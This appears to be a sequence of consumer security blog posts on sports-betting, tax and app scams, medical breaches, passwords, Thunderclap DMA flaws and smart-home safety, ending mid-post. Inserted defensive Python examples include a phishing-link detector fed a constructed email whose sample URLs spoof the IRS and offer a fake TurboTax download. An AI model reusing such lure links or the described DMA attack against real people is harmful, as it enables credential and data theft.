Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users look to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a “player” to watch the games, there’s a possibility that you could end up with nasty malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, and the sites may contain malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. Be careful, when you’re visiting these sites, not to click on any conspicuous ads or links that could contain malware. If you see an offer that interests you in an online ad, you’re better off going directly to the website of the company displaying the ad as opposed to clicking on the ad from the sports site or app.
  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.


How to Safeguard Your Family Against A Medical Data Breach

The risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out, or with the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records compromised through a hacking or IT incident, at a cost to consumers of nearly $6 billion.

The IoT Factor


Not only are medical facilities vulnerable to hackers; the growing number of Internet of Things (IoT) consumer products — which, in short, means everything is digitally connected to everything else — also provides entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, and heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals is children’s health information (stolen from pediatrician offices), since a child’s credit record is clean and therefore a more useful tool in credit card fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” says Samani.


Healthcare professionals, hospitals, and health insurance companies, while responsible for the entry points criminals use, aren’t the bad guys. They are fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices


According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their own protected networks
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices


Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victim to deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app off your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.


5 Tips For Creating Bulletproof Passwords

While biometric tools like facial ID and fingerprints have become more common when it comes to securing our data and devices, strong passwords still play an essential part in safeguarding our digital lives.

This can be frustrating at times, since many of us have more accounts and passwords than we can possibly remember. This can lead us to dangerous password practices, such as choosing short and familiar passwords, and repeating them across numerous accounts. But password safety doesn’t have to be so hard. Here are some essential tips for creating bulletproof passwords.

Remember, simple is not safe

Every year surveys find that the most popular passwords are as simple as “1234567” and just “password.” This is great news for the cybercrooks, but really bad news for the safety of our personal and financial information.

When it comes to creating strong passwords, length and complexity matter because they make passwords harder to guess, and harder to crack if the cybercriminal is using an algorithm to quickly process combinations. The alarming truth is that passwords that are just 7 characters long take less than a third of a second to crack using these “brute force attack” algorithms.

Tricks:

  • Make sure that your passwords are at least 12 characters long and include numbers, symbols, and upper and lowercase letters.
  • Try substituting numbers and symbols for letters, such as zero for “O”, or @ for “A”.
  • If you’re using internet-connected devices, like IP cameras and interactive speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

Keep it impersonal

Passwords that include bits of personal information, such as your name, address, or pet’s name, make them easier to guess. This is especially true when we share a lot of personal information online. But you can use personal preferences that aren’t well known to create strong passphrases.

Tricks:

  • Try making your password a phrase, with random numbers and characters. For instance, if you love crime novels you might pick the phrase: ILoveBooksOnCrime
    Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as: 1L0VEBook$oNcRIM3!
  • If you do need to use personal information when setting up security questions, choose answers that are not easy to find online.
  • Keep all your passwords and passphrases private.

Never reuse passwords

If you reuse passwords and someone guesses a password for one account, they can potentially use it to get into others. This practice has gotten even riskier over the last several years, due to the high number of corporate data breaches. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts.

Tricks:

  • Use a unique password for every account, even one that holds little personal information. Such accounts get breached too, and a password stolen from one of them will be tried against your more sensitive accounts.
  • If a website or monitoring service you use warns you that your details may have been exposed, change your password immediately.
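Added example, not from the original post: a password-exposure check modeled on the k-anonymity range lookup that breach-monitoring services offer, run offline here against a constructed breach corpus that stands in for the server. The client hashes the password with SHA-1, sends only the first five hex characters of the digest, and matches the remainder locally, so the service never learns which password was checked. `fake_fetch_range`, the corpus and its counts are all constructed for the example; a real client would make an HTTPS request in its place.

```python
import hashlib

# Constructed breach corpus standing in for the server side of a range-query
# service; the passwords and counts are made up for the example.
FAKE_BREACH_CORPUS = {"password123": 126927, "qwerty": 3912816, "letmein": 243000}
SENT = []  # records exactly what the client transmitted, to show how little it is


def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def fake_fetch_range(prefix):
    """Stand-in for the range endpoint (a real client would do an HTTPS GET):
    for a 5-hex-char prefix, return 'SUFFIX:COUNT' lines for every hash in the
    corpus that starts with it, plus filler a real response would also contain."""
    SENT.append(prefix)
    lines = []
    for pw, count in FAKE_BREACH_CORPUS.items():
        digest = sha1_hex(pw)
        if digest.startswith(prefix):
            lines.append(f"{digest[5:]}:{count}")
    lines.append("0" * 35 + ":1")  # unrelated suffix that happens to share the prefix
    return "\r\n".join(lines)


def parse_range_response(body):
    """Turn 'SUFFIX:COUNT' lines into a dict keyed by upper-case suffix."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if line:
            suffix, _, count = line.partition(":")
            counts[suffix.upper()] = int(count)
    return counts


def breach_count(password, fetch_range=fake_fetch_range):
    """How often `password` appears in the corpus. Only the first 5 hex characters
    of its SHA-1 leave the client; the suffix comparison happens locally."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


def should_reject(password, threshold=1):
    """Policy hook for a signup or password-change form: refuse any password
    that has been seen in a breach at least `threshold` times."""
    return breach_count(password) >= threshold


if __name__ == "__main__":
    for pw in ("password123", "correct horse battery staple"):
        print(f"{pw!r}: seen {breach_count(pw)} times, reject={should_reject(pw)}")
    print("what left the client:", SENT)
```

Note that SHA-1 is fine here only because it is an index into a public corpus, not a way of storing the password; the value being looked up is already known to be breached or not, and the five-character prefix maps to hundreds of unrelated hashes.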

Employ a password manager

If just the thought of creating and managing complex passwords has you overwhelmed, outsource the work to a password manager! These are software programs that can create random and complex passwords for each of your accounts, and store them securely. This means you don’t have to remember your passwords – you can simply rely on the password manager to enter them when needed.

Tricks:

  • Look for security software that includes a password manager
  • Make sure your password manager supports multi-factor authentication, meaning that unlocking the vault requires a second kind of proof beyond the master password, such as a fingerprint, facial recognition, or a code from an authenticator app or hardware key.

Boost your overall security

Now that you’ve made sure that your passwords are bulletproof, make sure you have comprehensive security software that can protect you from a wide variety of threats.

Tricks:

  • Keep your software up-to-date, and consider using a web advisor that protects you from accidentally typing passwords into phishing sites.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post 5 Tips For Creating Bulletproof Passwords appeared first on McAfee Blogs.

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

The researchers notified the firm, which took security measures in response. Even so, users can take steps themselves to limit the damage from a large-scale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Use a complex password for each of your accounts, and never reuse credentials across different platforms. Change a password promptly whenever the service, or a breach-monitoring service, reports an exposure; that targeted response protects you better than rotating passwords only on a fixed schedule.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

Don’t Let Thunderclap Flaws Strike Your Device

If you own a Mac or PC, odds are you’ve used your laptop’s Thunderbolt port to connect another device to your machine, whether a dock, a display, or something you’re charging. However, a set of newly disclosed flaws known as Thunderclap lets an attacker who plugs a malicious device into that port while the machine is running read sensitive information such as passwords, encryption keys and financial data out of memory, or run code on the system.

So, how can attackers exploit this flaw? Thunderbolt carries PCI Express, so an accessory plugged into the port is granted direct memory access (DMA): it can read and write the computer’s random-access memory (RAM) directly, without the data passing through the central processing unit (CPU). DMA saves processing time, which is why it is used, but it also means that a device with malicious firmware can issue its own memory reads and writes. The IOMMU is the hardware meant to confine each device to the memory regions it has been assigned; the Thunderclap researchers found that operating systems either left it off by default or used it in ways that still left sensitive data reachable. An attacker therefore needs only physical access and a device of their own, not a bug in the victim’s software, to lift secrets from memory or tamper with the running system.

Thunderclap-based attacks can be carried out with purpose-built malicious peripherals or with ordinary devices such as projectors or chargers whose firmware has been altered to attack whatever host they are connected to, and they can compromise a vulnerable computer in a matter of seconds. The researchers informed the manufacturers, who have shipped fixes and mitigations, but those do not close every gap, so it is worth taking extra precautions. Here are some ways users can defend themselves against these flaws:

  • Limit or disable the Thunderbolt interface. Note that removing “Thunderbolt Bridge” from the Network Preferences panel on a Mac only removes IP networking over Thunderbolt; it does not disable the port or its DMA access, so it is not a defense against Thunderclap. The effective controls are firmware settings: many PCs let you disable Thunderbolt outright in the BIOS/UEFI setup, or set it to require approval before a newly plugged device is given access, and let you enable the IOMMU (labeled VT-d or AMD-Vi on many boards). Keep the firmware and operating system updated so that the vendors’ mitigations are actually in place.
  • Don’t leave your computer unattended. Because this flaw requires a cybercriminal to have physical access to your device, make sure you keep a close eye on your laptop or PC to ensure no one can plug anything into your machine without permission.
  • Don’t borrow chargers or use publicly available charging stations. Public chargers may have been maliciously altered without your knowledge, so always use your own computer accessories.
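The list above gives no way to verify the settings it recommends, so here is an added example, not part of the original post, for Linux, where the kernel exposes the Thunderbolt security level and the IOMMU state in sysfs (`/sys/bus/thunderbolt/devices/domain0/security` and `/sys/kernel/iommu_groups`). The level names are the kernel’s; the risk ratings are an assumption for illustration, not a vendor scale. The `dponly` and `usbonly` levels refuse PCIe tunnelling entirely and therefore remove the DMA path, while `none` hands DMA to anything plugged in.

```python
from pathlib import Path

# Standard Linux sysfs locations: the Thunderbolt controller's security level
# and the IOMMU groups the kernel creates when DMA remapping is enabled.
TB_SECURITY = Path("/sys/bus/thunderbolt/devices/domain0/security")
IOMMU_GROUPS = Path("/sys/kernel/iommu_groups")

# Security levels as documented in the kernel's Thunderbolt admin guide.
LEVEL_NOTES = {
    "none": "every device is connected automatically and gets PCIe (DMA) access",
    "user": "devices need user approval, but an approved device still gets DMA",
    "secure": "approval plus a per-device key challenge; approved devices still get DMA",
    "dponly": "only DisplayPort tunnelling is allowed, no PCIe, so no DMA path",
    "usbonly": "only USB and DisplayPort tunnelling, no PCIe, so no DMA path",
}


def read_tb_security(path=TB_SECURITY):
    """Return the security level string, or None when no Thunderbolt domain exists."""
    try:
        return Path(path).read_text().strip()
    except OSError:
        return None


def iommu_active(groups_dir=IOMMU_GROUPS):
    """True when the kernel created IOMMU groups, i.e. DMA remapping is enabled."""
    groups_dir = Path(groups_dir)
    return groups_dir.is_dir() and any(groups_dir.iterdir())


def assess(level, iommu):
    """Map (security level, IOMMU on?) to an illustrative risk rating plus the reason."""
    if level is None:
        return "NONE", "no Thunderbolt controller present"
    if level in ("dponly", "usbonly"):
        return "LOW", LEVEL_NOTES[level]
    if level == "none":
        if iommu:
            return "MEDIUM", LEVEL_NOTES[level] + "; the IOMMU limits but, per Thunderclap, does not fully prevent memory access"
        return "HIGH", LEVEL_NOTES[level] + "; with the IOMMU off a malicious device reads RAM freely"
    if level in ("user", "secure"):
        if iommu:
            return "LOW", LEVEL_NOTES[level] + "; keep firmware and OS updated, the IOMMU alone is not a complete fix"
        return "MEDIUM", LEVEL_NOTES[level] + "; enable the IOMMU (VT-d / AMD-Vi) in firmware"
    return "UNKNOWN", f"unrecognised level {level!r}"


if __name__ == "__main__":
    level = read_tb_security()
    iommu = iommu_active()
    rating, why = assess(level, iommu)
    print(f"thunderbolt security: {level}, iommu groups: {iommu} -> {rating}: {why}")
```

On a machine with the `none` level and no IOMMU groups the script reports HIGH, which is the exact configuration the Thunderclap research exploited; the fix is in firmware setup, not in the network preferences.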

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Don’t Let Thunderclap Flaws Strike Your Device appeared first on McAfee Blogs.

How To Secure Your Smart Home

Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

You may remember a couple of years ago when thousands of infected devices were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

Still, given the benefits we get from these devices, they are probably here to stay.  We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

Cybercrooks have already taken note of these opportunities, and malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73% in the third quarter of 2018 alone.

So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

Follow these smart home safety tips:

  • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks many of these features, consider upgrading it.
  • Safeguard your devices—Before you connect a new IoT device to your home network, where it can reach data-rich devices like smartphones and computers, change the default username and password to something strong and unique. Attackers know the default settings and share them online. Then turn off any manufacturer features that do not benefit you, such as remote access; manufacturers use it to monitor their products, but cybercrooks can use it to reach your system. Finally, make sure the device software is up-to-date by checking the manufacturer’s website, so that you are protected against the vulnerabilities the manufacturer has already patched.
  • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router, and make sure the network name does not give away your address. Then check that your router is using a current encryption method, WPA2 or newer, to keep your communications secure. Consider setting up a “guest network” for your IoT devices: a second network on your router that keeps your computers and smartphones separate from IoT devices, so that if a device is compromised the attacker still cannot reach the valuable information saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
  • Install comprehensive security software –Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How To Secure Your Smart Home appeared first on McAfee Blogs.

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are worried about how much they might owe or are predicting how much they’ll get back as a refund, and scammers play to both emotions. So, as taxpayers wait for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. Phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. If an unfamiliar or remotely suspicious email asks for tax data, confirm its legitimacy through a channel you already trust, such as your manager or the security department, before you respond, and be wary of file attachments in general, not only ones with obviously odd names like “virus-for-you.doc.” Remember: the IRS initiates contact by postal mail, not by email, text, or social media, so an unsolicited email claiming to come from the IRS is a scam.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.
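As an added example not from the original post, the following Python applies the “investigate the domain” advice to the links in a constructed email: it pulls out every URL and flags the tricks tax phishers rely on, a brand name buried in a subdomain of an unrelated domain, credentials before an “@” that hide the real host, raw IP addresses, punycode host names that can imitate a brand with look-alike characters, and plain http. The trusted-domain allowlist, the brand list and the email text are assumptions for the example, and the registrable-domain logic is a two-label approximation that real code should replace with the Public Suffix List.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist for the example; a real deployment maintains its own.
TRUSTED_DOMAINS = {"irs.gov", "intuit.com"}
# Crude substring match on brand names; tune the list for your environment.
BRANDS = ("irs", "turbotax", "intuit")
URL_RE = re.compile(r"""https?://[^\s<>"')\]]+""", re.IGNORECASE)

# Constructed sample message in the style of the scams described above.
SAMPLE_EMAIL = (
    "IRS Important Notice: your refund is on hold.\n"
    "Check status at https://www.irs.gov/refunds or verify your identity now at\n"
    "http://irs.gov.refund-status-verify.com/login before it is seized.\n"
    "Download TurboTax 2018 at https://turbotax-download.example.net/get.exe.\n"
)


def extract_urls(text):
    """Every http(s) URL in the text, with trailing sentence punctuation removed."""
    return [u.rstrip(".,;:)") for u in URL_RE.findall(text)]


def registrable_domain(host):
    """Approximation using the last two labels; production code should consult the
    Public Suffix List so that names like example.co.uk are handled correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def inspect_url(url):
    """Return (host, registrable_domain, findings). An empty findings list means
    nothing suspicious was seen, not that the link is safe."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    findings = []
    if "@" in parts.netloc:
        findings.append("credentials before '@' hide the real host")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        findings.append("raw IP address instead of a domain name")
    if "xn--" in host or not host.isascii():
        findings.append("internationalized host name (possible homoglyph)")
    domain = registrable_domain(host)
    if domain not in TRUSTED_DOMAINS:
        for brand in BRANDS:
            if brand in host:
                findings.append(f"brand '{brand}' used under untrusted domain {domain}")
                break
        if parts.scheme.lower() != "https":
            findings.append("plain http, no transport protection")
    return host, domain, findings


def suspicious_urls(email_text):
    """Every URL in the text that produced at least one finding."""
    out = []
    for url in extract_urls(email_text):
        host, domain, findings = inspect_url(url)
        if findings:
            out.append((url, findings))
    return out


if __name__ == "__main__":
    for url, findings in suspicious_urls(SAMPLE_EMAIL):
        print(url)
        for f in findings:
            print("   -", f)
```

The one link the script leaves alone is the genuine irs.gov page; everything it flags is a domain that merely contains a brand name, which is exactly the distinction the human eye skips over when scanning an address bar.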

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

Beware! Even Good Domains Also Carry Malicious URLs

According to an article on helpnetsecurity.com, nearly 40 percent of otherwise benign domains hosted at least one malicious URL. That raises the question of whether legitimate websites are being compromised to host malicious content, and it means that blocking by domain reputation alone is not enough: defenders need a solution that gives them URL-level visibility.

Home users are the most exposed, since they typically have only basic protection or none at all compared with a business network. Helpnetsecurity reports that 68 percent of infections were detected on consumer endpoints versus 32 percent on business endpoints.

Phishing is on the rise, with the number of phishing sites growing 220 percent over the previous year. Notably, phishing sites now routinely use TLS certificates and HTTPS to appear genuine: the article reports that over 80 percent of phishing pages used HTTPS, so the padlock icon says nothing about whether a site is trustworthy. Financial institutions remain the favorite targets for impersonation, since a fake bank page is the easiest way to make people hand over credentials.

Webroot also found that organizations combining phishing simulation campaigns with regular training saw a 70 percent drop in click-through on phishing links.

Webroot further says that “a third of malware tries to install itself in %appdata% folders. Although malware can hide almost anywhere, Webroot found several common locations, including %appdata% (29.4 percent), %temp% (24.5 percent), and %cache% (17.5 percent), among others. These locations are prime for hiding malware because these paths are in every user directory with full user permissions to install there. These folders also are hidden by default on Windows Vista and up.”

Webroot also reports steadily less malware on Windows 10 machines than on Windows 7.

Hal Lonas, CTO, Webroot said: “We wax poetic about innovation in the cybersecurity field, but you only have to take one look at the stats in this year’s report to know that the true innovators are the cybercriminals. They continue to find new ways to combine attack methods or compromise new and existing vectors for maximum results. My call to businesses today is to be aware, assess your risk, create a layered approach that protects multiple threat vectors and, above all, train your users to be an asset—not a weak link—in your cybersecurity program.”

The post Beware! Even Good Domains Also Carry Malicious URLs appeared first on .

Top 3 Cybersecurity Measures: Skepticism, Awareness and Training

What comes to mind when you hear about an information leak caused by unauthorized access? And why does the number of data breach incidents not decrease? One reason is the growing sophistication of attacks. A common route to unauthorized access is to email malware to a targeted person, and these emails now look so convincing that the target opens the attachment without a second thought, infects the device, and the leak follows.

In this Threat Report article, we try to clear up the confusion about why data breaches happen, written in the plain English of an ordinary Joe and Jill.

Crisis Awareness

